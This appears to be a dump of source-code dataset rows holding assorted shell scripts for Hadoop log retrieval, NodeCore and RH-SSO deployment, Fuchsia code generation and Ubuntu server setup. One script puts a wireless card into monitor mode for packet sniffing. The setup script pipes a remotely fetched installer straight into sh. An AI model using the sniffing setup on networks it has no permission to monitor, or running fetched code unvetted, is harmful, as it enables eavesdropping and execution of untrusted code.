blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
9fd42b30502e3280ba7873b49fbc7b2b54e42c80
|
Shell
|
pfarrell/emr-scripts
|
/bin/get_logs.sh
|
UTF-8
| 188
| 2.859375
| 3
|
[] |
no_license
|
#! /bin/bash
# Fetch the S3 logs for an EMR job and open them locally.
# Usage: get_logs.sh <job-id>|last
# Requires: emr CLI, s3cmd, and HADOOP_LOG_DIR pointing at the S3 log root.
job=$1
case "$job" in
# "last" resolves to the most recently COMPLETED job id: first listing
# line, with everything after the first space stripped by sed.
last) job=$(emr --list --state COMPLETED 2>/dev/null | head -1 | sed -e 's: .*::g');;
esac
# Recursively download the job's log directory into ./logs, then open it.
s3cmd get -r "${HADOOP_LOG_DIR}/$job" logs
open "logs/$job"
| true
|
81a6652f26f9ff8d2efc3240ed7a27018ee605fa
|
Shell
|
aceburgess/monitor-packets-scripts
|
/monitor-mode.sh
|
UTF-8
| 238
| 3.078125
| 3
|
[] |
no_license
|
#! /bin/bash
# Put wlan0 into 802.11 monitor mode, then hop across channels 1-11
# (one second per channel) forever. Must run as root; Ctrl-C to stop.
ifconfig wlan0 down && iw dev wlan0 set type monitor && ifconfig wlan0 up
echo "You're entering Monitor Mode on wlan0"
# Endless channel-hopping loop so captures see every 2.4 GHz channel.
while true; do
for chanum in {1..11}; do
iwconfig wlan0 channel "$chanum"
sleep 1
done
done
| true
|
5dd86dd4549bc120fd7e5c34bcafa29e3f800577
|
Shell
|
VeriBlock/samples
|
/scripts/docker_nodecore_bootstrap.sh
|
UTF-8
| 2,588
| 4.3125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Bootstrap a VeriBlock NodeCore docker node: confirm with the user, check
# minimum system requirements, download/unpack the latest mainnet bootstrap,
# then launch the docker.io/veriblock/nodecore image. Must run as root.
echo "This script will generate a directory, install the latest nodecore bootstrap, and start a docker image which will start nodecore. Make sure you are running this as root!"
read -p "Continue (y/n)?" choice
case "$choice" in
y|Y ) echo "yes";;
n|N ) exit 0;;
* ) exit 0;;
esac
# Resolve the URL of the latest bootstrap zip from the explorer API.
LATEST_BOOTSTRAP=$(curl -s https://explore.veriblock.org/api/stats/download | jq -r .bootstrapfile_zip)
BOOTSTRAP="$(basename "$LATEST_BOOTSTRAP")"
echo "Starting script!"
## Shoutout panda
echo "Checking to see if your system meets the minimum requirements for NodeCore to run..."
# MemTotal is in kB; dividing by 1,000,000 approximates GB.
TOTALMEM=$(head -n 1 /proc/meminfo | tr -d -c 0-9)
TOTALMEM=$((TOTALMEM/1000000))
echo System Memory: $TOTALMEM GB
TOTALCORES=$(nproc)
echo System Cores: $TOTALCORES
TOTALDISK=$(df -H "$HOME" | awk 'NR==2 { print $2 }' | tr -d -c 0-9)
echo Disk Size: $TOTALDISK GB
# Bug fix: free space is column 4 ("Avail") of df output; the original read
# column 2 (total size), so the 15GB-free check never actually checked free space.
FREESPACE=$(df -H "$HOME" | awk 'NR==2 { print $4 }' | tr -d -c 0-9)
echo Free Disk Space: $FREESPACE GB
if [ "$TOTALMEM" -lt 4 ]
then
echo "Sorry, but this system needs at least 4GB of RAM for NodeCore to run. Exiting Install..."
exit
elif [ "$TOTALCORES" -lt 2 ]
then
echo "Sorry, but this system needs at least 2 cores for NodeCore to run. Exiting Install..."
exit
elif [ "$TOTALDISK" -lt 50 ]
then
echo "Sorry, but this system needs at least 50GB total disk space for NodeCore to run. Exiting Install..."
exit
elif [ "$FREESPACE" -lt 15 ]
then
echo "Sorry, but this system needs at least 15GB free disk space for NodeCore to run. Exiting Install..."
exit
else
echo "Your system is suitable, continuing installation of NodeCore..."
fi
echo "========================"
# Verify docker is installed; command -v is the portable existence check
# (running bare `docker` relied on its help-screen exit status).
if ! command -v docker > /dev/null 2>&1
then
echo "Please install Docker!"
exit 0
else
echo "Docker is installed!"
fi
echo "========================="
mkdir -p /root/nc_data/mainnet
# Bug fix: the message used to say /root/_nc_data/mainnet (wrong path).
echo "/root/nc_data/mainnet directory created"
echo "========================="
sleep 5
echo "downloading the latest bootstrap"
wget -P /root/nc_data/mainnet "$LATEST_BOOTSTRAP"
echo "========================="
unzip "/root/nc_data/mainnet/$BOOTSTRAP" -d /root/nc_data/mainnet/
echo "bootstrap unzipped!"
echo "========================="
# Allow RPC access from the default docker0 bridge address.
echo "rpc.whitelist.addresses=172.17.0.1" > /root/nc_data/nodecore.properties
echo "Added docker0 bridge to nodecore.properties"
echo "========================="
sleep 5
echo "starting docker image"
docker run -d --name scripttest -v /root/nc_data:/data -p 7500:7500 -p 10500:10500 docker.io/veriblock/nodecore
echo "docker image started"
sleep 5
echo "========================="
docker ps
| true
|
656ac5d50422bcb629cf493c9077c4159e559a41
|
Shell
|
gemichelst/changeDate.app
|
/CreateAPP
|
UTF-8
| 1,194
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Assemble the changeDate.app bundle: refresh Info.plist, the icon and the
# gtouch helper from ./SRC into ./APP/changeDate.app, then build the DMG.
# copy icons, plist and gtouch
APP_NAME=changeDate
DIR_CURRENT=$(pwd)
echo "current-dir: $DIR_CURRENT"
# Bug fix: all failure paths previously exited with status 0, which hid
# errors from callers and CI; they now exit 1.
if [ ! -d "$DIR_CURRENT/APP/$APP_NAME.app" ];
then
echo "APP-DIR: [failed]"
exit 1
fi
echo "APP-DIR: [OK]"
if [ ! -d "$DIR_CURRENT/SRC" ];
then
echo "SRC-DIR: [failed]"
exit 1
fi
echo "SRC-DIR: [OK]"
if [ ! -f "$DIR_CURRENT/SRC/Info.plist" ];
then
echo "Info.plist: [failed]"
exit 1
else
rm "$DIR_CURRENT/APP/$APP_NAME.app/Contents/Info.plist"
cp "$DIR_CURRENT/SRC/Info.plist" "$DIR_CURRENT/APP/$APP_NAME.app/Contents/Info.plist"
echo "Info.plist: [OK]"
fi
if [ ! -f "$DIR_CURRENT/SRC/changeDate.icns" ];
then
echo "changeDate.icns: [failed]"
exit 1
else
cp "$DIR_CURRENT/SRC/changeDate.icns" "$DIR_CURRENT/APP/$APP_NAME.app/Contents/Resources/changeDate.icns"
echo "changeDate.icns: [OK]"
fi
if [ ! -f "$DIR_CURRENT/SRC/gtouch" ];
then
echo "gtouch: [failed]"
exit 1
else
cp "$DIR_CURRENT/SRC/gtouch" "$DIR_CURRENT/APP/$APP_NAME.app/Contents/Resources/gtouch"
echo "gtouch: [OK]"
fi
echo "> preparation completed ..."
# -f: do not error when no old archives/images exist yet.
rm -f *.bz2 *.dmg
echo "> creating DMG ..."
make all
exit 0
| true
|
5b5911ca8f405d7744c21d2d3031bdd74b54a5b5
|
Shell
|
naggenius/BIP
|
/BIP_App-master/UX/batch/shell/MANNUEL/alimsuivijhr.sh
|
ISO-8859-1
| 1,590
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/ksh
#_______________________________________________________________________________
# Application : BIP (Base d'Informations Projets / project information base)
# File name   : alimsuivijhr.sh
# Purpose     : Monthly batch shell "alimsuivijhr" (all monthly processing).
#               Populates the suivijhr table, which feeds the man-day (JH)
#               follow-up report; loads the data for the monthly period.
#
#_______________________________________________________________________________
# Created       : ARE 22/08/2002
# Modifications :
# --------------
# Author  Date      Subject
# EGR     14/10/02  Migration to ksh on SOLARIS 8
#
################################################################################
# Obsolete
#################################################
# Load the shared environment (defines APP_ETC, DIR_BATCH_SHELL_LOG,
# ORA_USR_LIVE, ORA_LIVE, ...)
#################################################
. $APP_ETC/bipparam.sh
#################################################
# Trace of the batch execution,
# written to the log directory (one file per day)
RESULT_FILE=$DIR_BATCH_SHELL_LOG/alimsuivijhr.`date +"%Y%m%d"`.log
# Invoke SQL*Plus (silent mode -s) with execution trace captured in the log;
# uses the unix login (must be defined in the database)
sqlplus -s $ORA_USR_LIVE@$ORA_LIVE <<! > $RESULT_FILE
whenever sqlerror exit failure;
execute pack_suivijhr.alim_suivijhr;
!
# SQL*Plus exit status (captured immediately after the heredoc command)
PLUS_EXIT=$?
if [ $PLUS_EXIT -ne 0 ]
then
print 'Problme SQL*PLUS dans batch alimsuivijhr : consulter ' $RESULT_FILE
print "et le fichier $DIR_BATCH_SHELL_LOG/AAAA.MM.JJ.alimsuivijhr.log du jour"
exit -1;
fi
print 'ALIMSUIVIJHR OK'
exit 0
| true
|
2dd51d9861590dc2bc7b2e33ee86551bc4fdbf94
|
Shell
|
gnoliyil/fuchsia
|
/src/devices/tools/fidlgen_banjo/regen_banjo_tests.sh
|
UTF-8
| 4,380
| 2.9375
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# Copyright 2020 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Regenerates the checked-in fidlgen_banjo golden outputs (C, C++,
# C++-internal, C++-mock and Rust backends) from the .fidl sources under
# tests/fidl. Optional $1 restricts regeneration to one test (basename,
# no extension). Must run under `fx exec` so FUCHSIA_BUILD_DIR is set.
set -e
if [[ ! -d "${FUCHSIA_BUILD_DIR}" ]]; then
echo "FUCHSIA_BUILD_DIR environment variable not a directory; are you running under fx exec?" 1>&2
exit 1
fi
# Source/output directories and the prebuilt host tools.
BANJO_DIR="$FUCHSIA_DIR/src/devices/tools/fidlgen_banjo/"
FIDL_IR_FILE="${FUCHSIA_BUILD_DIR}/fildgen_banjo_test_ir.json"
FIDL_FILES="$BANJO_DIR/tests/fidl"
C_FILES="$BANJO_DIR/tests/c"
CPP_FILES="$BANJO_DIR/tests/cpp"
RUST_FILES="$BANJO_DIR/tests/rust"
AST_FILES="$BANJO_DIR/tests/ast"
FIDLGEN_BANJO="$FUCHSIA_BUILD_DIR/host_x64/exe.unstripped/fidlgen_banjo"
FIDLC="$FUCHSIA_BUILD_DIR/host_x64/exe.unstripped/fidlc"
FILE="$1"
for f in $FIDL_FILES/*
do
# Split "name.test.fidl" into name ("filename") and extension ("fidl").
filename=$(basename -- "$f")
extension="${filename##*.*.}"
filename="${filename%.*.*}"
if [ ! -z "$FILE" ] && [ "$filename" != "$FILE" ]; then
continue
fi
if [ "$extension" != "fidl" ]; then
continue
fi
# Skip sources that intentionally fail or are pulled in as dependencies.
if [ "$filename" = "badtype" ]; then
continue
fi
if [ "$filename" = "librarypart_two" ]; then
continue
fi
# Per-test configuration: extra fidlc inputs and which backends to run.
dependencies=""
with_c=true
with_cpp=true
with_cpp_mock=false
with_rust=true
# Tests that use zx types need the vdso FIDL definitions compiled in.
if [ "$filename" = "callback" ] || [ "$filename" = "simple" ] || [ "$filename" = "interface" ] \
|| [ "$filename" = "protocolbase" ] || [ "$filename" = "api" ] \
|| [ "$filename" = "passcallback" ] || [ "$filename" = "fidlhandle" ] \
|| [ "$filename" = "handles" ] || [ "$filename" = "protocolarray" ] \
|| [ "$filename" = "protocolvector" ] || [ "$filename" = "tables" ] \
|| [ "$filename" = "example9" ] || [ "$filename" = "protocolhandle" ] \
|| [ "$filename" = "types" ] || [ "$filename" = "order4" ] || [ "$filename" = "order5" ]; then
dependencies="$dependencies --files $FUCHSIA_DIR/zircon/vdso/rights.fidl $FUCHSIA_DIR/zircon/vdso/zx_common.fidl"
fi
if [ "$filename" = "order6" ]; then
dependencies="$dependencies --files $FIDL_FILES/order7.test.fidl"
fi
if [ "$filename" = "view" ]; then
dependencies="$dependencies --files $FIDL_FILES/point.test.fidl"
fi
if [ "$filename" = "callback" ]; then
dependencies="$dependencies --files $FIDL_FILES/callback2.test.fidl"
fi
# Tests with no protocols (pure data types) have no C++ golden files.
if [ "$filename" = "enums" ] || [ "$filename" = "bits" ] || [ "$filename" = "types" ] \
|| [ "$filename" = "example0" ] || [ "$filename" = "example1" ] \
|| [ "$filename" = "example2" ] || [ "$filename" = "example3" ] \
|| [ "$filename" = "alignment" ] || [ "$filename" = "example8" ] || [ "$filename" = "point" ] \
|| [ "$filename" = "tables" ]; then
with_cpp=false
fi
if [ "$filename" = "passcallback" ] || [ "$filename" = "protocolarray" ] \
|| [ "$filename" = "protocolbase" ] || [ "$filename" = "protocolhandle" ] \
|| [ "$filename" = "protocolothertypes" ] || [ "$filename" = "protocolprimitive" ] \
|| [ "$filename" = "protocolvector" ] || [ "$filename" = "interface" ]; then
with_cpp_mock=true
fi
if [ "$filename" = "rustderive" ]; then
with_c=false
with_cpp=false
fi
if [ "$filename" = "parameterattributes" ]; then
with_rust=false
with_c=false
with_cpp=false
fi
if [ "$filename" = "handles" ]; then
with_rust=false
fi
if [ "$filename" = "constants" ] || [ "$filename" = "order" ] || [ "$filename" = "union" ] \
|| [ "$filename" = "order1" ] || [ "$filename" = "order2" ] || [ "$filename" = "order3" ] \
|| [ "$filename" = "order4" ] || [ "$filename" = "order5" ] || [ "$filename" = "order6" ] \
|| [ "$filename" = "order7" ]; then
with_cpp=false
with_rust=false
fi
# Compile the FIDL source to JSON IR, then run each enabled backend on it.
echo "Regenerating $filename"
$FIDLC --json "${FIDL_IR_FILE}" $dependencies --files $f
if [ $with_c = true ]; then
$FIDLGEN_BANJO --backend C --output "$C_FILES/$filename.h" --ir "${FIDL_IR_FILE}"
fi
if [ $with_cpp = true ]; then
$FIDLGEN_BANJO --backend cpp --output "$CPP_FILES/$filename.h" --ir "${FIDL_IR_FILE}"
$FIDLGEN_BANJO --backend cpp_internal --output "$CPP_FILES/$filename-internal.h" --ir "${FIDL_IR_FILE}"
fi
if [ $with_cpp_mock = true ]; then
$FIDLGEN_BANJO --backend cpp_mock --output "$CPP_FILES/mock-$filename.h" --ir "${FIDL_IR_FILE}"
fi
if [ $with_rust = true ]; then
$FIDLGEN_BANJO --backend rust --output "$RUST_FILES/$filename.rs" --ir "${FIDL_IR_FILE}"
fi
done
| true
|
0597835370438b495f38fde4ee9fafed32a31431
|
Shell
|
Ner0/arch-pantheon
|
/Unstable/pantheon-dock/PKGBUILD
|
UTF-8
| 1,265
| 2.859375
| 3
|
[] |
no_license
|
# Maintainer: Ner0
# Arch Linux PKGBUILD: builds pantheon-dock from its Bazaar trunk at a
# pinned revision ($pkgver) and packages it as a plank-bzr replacement.
pkgname=pantheon-dock-bzr
pkgver=704
pkgrel=1
pkgdesc="The dock for elementary Pantheon, built on the awesome foundation of Plank."
arch=('i686' 'x86_64')
url="https://launchpad.net/pantheon-dock"
license=('GPL3')
groups=('pantheon')
depends=('bamf' 'glib2' 'gtk3' 'libgee' 'libwnck3' 'libx11' 'python2' 'hicolor-icon-theme' 'cairo' 'pango' 'libdbusmenu-gtk3')
makedepends=('bzr' 'dbus-glib' 'intltool' 'pkg-config' 'vala' 'gnome-common')
conflicts=('plank-bzr')
provides=("plank-bzr=$pkgver")
options=('!libtool')
install=pantheon-dock.install
# Bazaar branch location and local checkout directory name.
_bzrtrunk=lp:pantheon-dock
_bzrmod=pantheon-dock
# Fetch/update the bzr checkout at revision $pkgver, then configure and
# compile in a scratch copy ($_bzrmod-build) so the checkout stays clean.
build() {
msg "Connecting to Bazaar server...."
if [ -d $_bzrmod ]; then
cd $_bzrmod && bzr pull $_bzrtrunk -r $pkgver && cd ..
msg "The local files are updated."
else
bzr branch $_bzrtrunk $_bzrmod -r $pkgver
fi
msg "BZR checkout done or server timeout"
msg "Starting make..."
rm -rf $_bzrmod-build
cp -rf $_bzrmod $_bzrmod-build
cd $_bzrmod-build
./autogen.sh --prefix=/usr --sysconfdir=/etc
make ${MAKEFLAGS}
}
# Install into $pkgdir and point the apport hook at python2.
package() {
cd "$_bzrmod-build/"
make GCONF_DISABLE_MAKEFILE_SCHEMA_INSTALL=1 DESTDIR="$pkgdir/" install
sed -i 's/python/python2/' "$pkgdir/usr/share/apport/package-hooks/source_plank.py"
}
| true
|
33894ddf460d04340290ba682e2acc8c9dcee901
|
Shell
|
smartqubit/rhsso-with-ext-postgresql-db-cli
|
/cleanup.sh
|
UTF-8
| 785
| 2.765625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Tear down the RH-SSO demo deployment: remove the generated certificate and
# keystore files, then delete the OpenShift secrets, service account and
# resources that the setup scripts created in ${SSO_NAMESPACE}.
#EXIT ON ERROR
#set -e
BASEDIR=$(dirname "$0")
# Pull in CACERT_FILENAME, HTTPS_SECRET, SSO_NAMESPACE, etc.
. "${BASEDIR}/sso_env.sh"
# -f: some of the generated files may never have been created; don't error.
rm -f "${CACERT_FILENAME}" "${CAKEY_FILENAME}" *.srl "${HTTPS_KEYSTORE_FILENAME}" "${JGROUPS_ENCRYPT_KEYSTORE}" "${SSOCERT}" "${SSOSIGNREQ}" "${SSO_TRUSTSTORE_FILENAME}"
echo "switch to ${SSO_NAMESPACE} project"
# Test the command status directly instead of inspecting $? afterwards;
# the output is kept so it can be shown on failure.
if error=$(oc project "${SSO_NAMESPACE}"); then
echo "OK! "
else
echo "$error"
exit 1
fi
#oc delete secret env-datasource
oc delete secret cli-scripts -n "${SSO_NAMESPACE}"
oc delete secret "${HTTPS_SECRET}" -n "${SSO_NAMESPACE}"
oc policy remove-role-from-user view system:serviceaccount:$(oc project -q):sso-service-account
oc delete serviceaccount sso-service-account -n "${SSO_NAMESPACE}"
oc delete -f "${BASEDIR}/sso73-https-postgresql-external-cli.yaml" -n "${SSO_NAMESPACE}"
| true
|
0d614e7ce5809cc6245b3aa02ad3bd80a5ddffed
|
Shell
|
LunaNyan/my_little_server_ubuntu
|
/setup.sh
|
UTF-8
| 3,717
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# Ubuntu server bootstrap: update packages, harden sysctl, install Oh My Zsh,
# and optionally set up JupyterLab, iptables rules, a CN IP blocklist and a
# Minecraft server. The optional parts are toggled by flags from config.sh.
# Load config (defines $c_jupyter, $c_iptables, $c_blockcnip, $c_mcserver,
# $c_mcserver_uri, ...)
. config.sh
# first, remember current directory, then go to your glorious home
cwd=$(pwd)
cd ~
# Make minimal home structure
mkdir apps workspace
# Update
sudo apt update
sudo apt upgrade -y
# Install essential packages
sudo apt install htop nano zsh wget python3-dev python3-pip screen
# Set some kernel params
# NOTE(review): these sed edits and `sysctl -p` need root to touch
# /etc/sysctl.conf; run the whole script as root or they silently fail.
sed -i 's/#net.ipv4.conf.default.rp_filter=1/net.ipv4.conf.default.rp_filter=1/' /etc/sysctl.conf
sed -i 's/#net.ipv4.conf.all.rp_filter=1/net.ipv4.conf.all.rp_filter=1/' /etc/sysctl.conf
sed -i 's/#net.ipv4.conf.all.accept_source_route = 0/net.ipv4.conf.all.accept_source_route = 0/' /etc/sysctl.conf
sed -i 's/#net.ipv6.conf.all.accept_source_route = 0/net.ipv6.conf.all.accept_source_route = 0/' /etc/sysctl.conf
sed -i 's/#net.ipv4.conf.all.send_redirects = 0/net.ipv4.conf.all.send_redirects = 0/' /etc/sysctl.conf
sed -i 's/#net.ipv4.tcp_syncookies=1/net.ipv4.tcp_syncookies=1/' /etc/sysctl.conf
sed -i 's/#net.ipv4.conf.all.log_martians = 1/net.ipv4.conf.all.log_martians = 1/' /etc/sysctl.conf
sed -i 's/#net.ipv4.conf.all.accept_redirects = 0/net.ipv4.conf.all.accept_redirects = 0/' /etc/sysctl.conf
sed -i 's/#net.ipv6.conf.all.accept_redirects = 0/net.ipv6.conf.all.accept_redirects = 0/' /etc/sysctl.conf
sysctl -p
# Install Oh My Zsh and apply my own theme
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
git clone https://github.com/lunanyan/dragon-zsh-theme
mv ./dragon-zsh-theme/dragon.zsh-theme ~/.oh-my-zsh/custom/themes/dragon.zsh-theme
rm -rfv ./dragon-zsh-theme
# (Optional) Install Jupyter
if [ "$c_jupyter" = true ] ; then
# Bug fix: pip has no -y flag; `pip3 install jupyterlab -y` errored out.
pip3 install jupyterlab
jupyter notebook --generate-config
# Bug fix: without -i these sed calls only printed the edited config to
# stdout and never modified jupyter_notebook_config.py.
sed -i "s/#c.NotebookApp.ip = 'localhost'/c.NotebookApp.ip = '*'/" ~/.jupyter/jupyter_notebook_config.py
sed -i "s/#c.NotebookApp.allow_origin = ''/c.NotebookApp.allow_origin = '*'/" ~/.jupyter/jupyter_notebook_config.py
sed -i "s/#c.NotebookApp.port = 8888/c.NotebookApp.port = 30000/" ~/.jupyter/jupyter_notebook_config.py
echo "from notebook.auth import passwd; passwd()" | python3
fi
# (Optional) Set iptables rules
if [ "$c_iptables" = true ] ; then
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT
iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -m conntrack --ctstate ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -m conntrack --ctstate ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dports 80,443 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --dports 80,443 -m conntrack --ctstate ESTABLISHED -j ACCEPT
iptables -A INPUT -j LOG
iptables -A FORWARD -j LOG
ip6tables -A INPUT -j LOG
ip6tables -A FORWARD -j LOG
netfilter-persistent save
fi
# (Optional) Block cn ip
# Bug fix: the test was written `["$c_blockcnip" = true ]` (no space after
# '['), which bash parses as an unknown command, so the branch never ran.
if [ "$c_blockcnip" = true ] ; then
git clone https://github.com/LunaNyan/china_fucking
cd china_fucking
sudo ./china_fucking_iptables.sh
cd ..
rm -rf china_fucking
fi
# (Optional) Install Minecraft Server
if [ "$c_mcserver" = true ] ; then
sudo apt install openjdk-8-jre-headless
cd apps
mkdir minecraft_server
cd minecraft_server
wget -O server.jar "$c_mcserver_uri"
cp "$cwd/toolbox/server.properties" .
cp "$cwd/toolbox/server.sh" .
echo "eula=true" > eula.txt
fi
| true
|
f6b5864c9fefd917d4959a3a4cc17778b2c1127d
|
Shell
|
FutureApp/a-bench
|
/admin.sh
|
UTF-8
| 12,783
| 3.5
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
#@ Author: Michael Czaja <michael-czaja-arbeit@hotmail.de>
LB='\033[1;34m'
RR='\033[1;31m'
NC='\033[0m' # No Color
bench_tag=${LB}[A-Bench]${NC}
home_framework=$(pwd)
home_bench_sub_bigbench=$home_framework/submodules/bigbenchv2
home_container_bench=/bigbenchv2
# all functions calls are indicated by prefix <util_xxx>
source dir_bench/lib_bench/shell/util.sh
# all functions calls are indicated by prefix <kubernetes_xxx>
source dir_bench/lib_bench/shell/kubernetes.sh
# all functions calls are indicated by prefix <bench_xx>
source dir_bench/lib_bench/shell/bench.sh
if [[ $# -eq 0 ]] ; then
util_print_help
exit 0
fi
for var in "$1"
do
case $var in
#--------------------------------------------------------------------------------[ ABench - Presteps ]--
(auto_install) # -- Triggers all mechanism to install all req. components
bench_installMissingComponents
;;
#---------------------------------------------------------------------[ ABench - Infrastructure ]--
(senv_a) # -- Starts abench in config A with Kubernetes and Minikube
bench_preflight
numberCPUs=${2:-2} # Sets default value 4 CPUs
numberMemory=${3:-6144} # Sets default value 6144 MB
numberDiskSizeGB="${4:-16}g"
minikube delete
minikube start --cpus $numberCPUs --memory $numberMemory --disk-size $numberDiskSizeGB || \
( echo "ERROR. Check the error-message, resolve the problem and then try again." && \
exit 1)
# minikube after work
# workaround to handle time based desync between host and minikube
# src: https://github.com/kubernetes/minikube/issues/1378
minikube ssh -- docker run -it --rm --privileged --pid=host alpine nsenter \
-t 1 -m -u -n -i date -u $(date -u +%m%d%H%M%Y)
util_sleep 10
eval $(minikube docker-env)
minikube addons enable addon-manager
minikube addons enable default-storageclass
minikube addons enable dashboard
minikube addons enable storage-provisioner
minikube addons enable heapster
helm init
util_sleep 10
# -----------
# starts the influxDB-collector-client
kubectl apply -f ./dir_bench/images/influxdb-client/kubernetes/deploy_influxdb-client.yaml
kubectl create -f ./dir_bench/images/influxdb-client/kubernetes/service_influxdb-client.yaml
kubernetes_waitUntilAllPodsAvailable 11 40 10 # expected containers; retrys; sleep-time[s]
#### END
echo -e "${bench_tag} Startup procedure was successfully."
echo -e "${bench_tag} If you like to interact with docker in minikube then remember to link your docker with the one in minikube."
echo -e """${bench_tag} To do so, use the follwing command:
eval \$(minikube docker-env)
"""
;;
(senv_b) # -- Starts the framework-env. in config. B within a cloud-infrastructure - not supported -
echo "The framework doesn't support the configuration B (cloud-env) right now."
;;
#---------------------------------------------------------------------[ Live-Monitoring ]--
(show_all_das) # -- Opens all *-dashboards
./$0 show_grafana_das &
sleep 10;
./$0 show_kuber_das
;;
(show_grafana_das) # -- Opens the Grafan-dashboard.
mini_ip=$(minikube ip)
linkToDashboard="http://$(minikube ip):30002/dashboard/db/pods?orgId=1&var-namespace=kube-system&var-podname=etcd-minikube&from=now-15m&to=now&refresh=10s"
xdg-open $linkToDashboard
;;
(show_kuber_das) # -- Opens the Kubernetes-dashboard
minikube dashboard
;;
#---------------------------------------------------------------------[ Export data ]--
(export_data) # -- Exports measurments. In1: sTime; In2: eTime; In3:location
echo "exporting data now"
s_time=$2
e_time=$3
location="$4"
echo "Input-parameter: $@"
ipxport_data_client=$(bench_minikube_nodeExportedK8sService_IPxPORT influxdb-client)
echo "minikube detected: $ipxport_data_client"
url="http://$ipxport_data_client/csv-zip?host=monitoring-influxdb&port=8086&dbname=k8s&filename=experi01&fromT=$s_time&toT=$e_time"
echo "Calling the following URl <$url>"
curl $url --output $location
echo "Data(saved) location: $location"
;;
#--------------------------------------------------------------------------------[ Experiments ]--
(demo_from_scratch_sre) # -- Deploys abench (config A); Runs a single-run-experiment [BBV2-Modul]
./$0 senv_a
sleep 15
mini_ip=$(minikube ip)
linkToDashboard="http://$(minikube ip):30002/dashboard/db/pods?orgId=1&var-namespace=kube-system&var-podname=etcd-minikube&from=now-15m&to=now&refresh=10s"
# opens some dash-boards
xdg-open $linkToDashboard &
minikube dashboard &
# downloads the sub-module bbv2
./$0 down_submodules
# experiment execution
./$0 run_sample_sre_bbv
url="http://$ipxport_data_client/csv-zip?host=monitoring-influxdb&port=8086&dbname=k8s&filename=experi01&fromT=$s_time&toT=$e_time"
;;
(demo_from_scratch_mre) # -- Deploys abench (config A); Runs a multi-run-experiment [BBV2-Modul]
./$0 senv_a
sleep 15
mini_ip=$(minikube ip)
linkToDashboard="http://$(minikube ip):30002/dashboard/db/pods?orgId=1&var-namespace=kube-system&var-podname=etcd-minikube&from=now-15m&to=now&refresh=10s"
# opens some dash-boards
xdg-open $linkToDashboard &
minikube dashboard &
# downloads the sub-module bbv2
./$0 down_submodules
# experiment execution
./$0 run_sample_mre_bbv
#url="http://$ipxport_data_client/csv-zip?host=monitoring-influxdb&port=8086&dbname=k8s&filename=experi01&fromT=$s_time&toT=$e_time"
;;
(demo_from_scratch_env) # -- Deploys abench (config A); Runs an env-run-experiment [BBV2-Modul]
./$0 senv_a
sleep 15
mini_ip=$(minikube ip)
linkToDashboard="http://$(minikube ip):30002/dashboard/db/pods?orgId=1&var-namespace=kube-system&var-podname=etcd-minikube&from=now-15m&to=now&refresh=10s"
# opens some dash-boards
xdg-open $linkToDashboard &
minikube dashboard &
# downloads the sub-module bbv2
./$0 down_submodules
export TEST_QUERIES="q16" &&\
export EX_TAG="experiment_tag_sample" &&\
./$0 run_by_env_bbv
#url="http://$ipxport_data_client/csv-zip?host=monitoring-influxdb&port=8086&dbname=k8s&filename=experi01&fromT=$s_time&toT=$e_time"
;;
#-----------------------------------------------------------------------------------------[ Modules ]--
# Here is a good place to insert code which download your framework or benchmark
(down_submodules) # -- Downloads or updates all ABench-modules
./$0 down_bbv_two
echo "Download has finished [down_all]"
;;
(down_bbv_two) # -- Downloads or updates the bbv2-module
mkdir -p submodules
cd submodules
git clone https://github.com/FutureApp/bigbenchv2.git
cd bigbenchv2 && git pull
echo "Download has finished [bbv2-modul]"
;;
#------------------------------------------------------------------------------------[ Mod_ENV ]--
(start_bbv_hive) # -- Starts a minimal hive-experiment-infrastructure [BBV2]
./$0 down_bbv_two
cd submodules/bigbenchv2/a-bench_connector/experiments/env-run-experiment/
bash ENV_experiment_demoHIVE.sh cus_build
bash ENV_experiment_demoHIVE.sh cus_deploy
echo "Hive-ENV deployed"
;;
(start_bbv_spark) # -- Starts a minimal spark-experiment-infrastructure [BBV2]
./$0 down_bbv_two
cd submodules/bigbenchv2/a-bench_connector/experiments/env-run-experiment/
bash ENV_experiment_demoSPARK.sh cus_build
bash ENV_experiment_demoSPARK.sh cus_deploy
echo "Spark-ENV deployed"
;;
#----------------------------------------------------------------------------------[ Custom - Runners ]--
(run_sample_sre_bbv) # -- Executes the SRE_experiment_demoHIVE.sh experiment in [BBV2]
cd submodules/bigbenchv2/a-bench_connector/experiments/single-run-experiment/
bash SRE_experiment_demoHIVE.sh run_ex # Contains the implementation of the experiment. Like build,deploy and execution orders.
;;
(run_sample_mre_bbv) # -- Executes the MRE_experiment_demoHIVE.sh experiment in [BBV2] 2 x times
cd submodules/bigbenchv2/a-bench_connector/experiments/multi-run-experiment/
bash MRE_experiment_demoHIVE.sh run_ex 2 # Contains the implementation of the experiment. Like build,deploy and execution orders.
;;
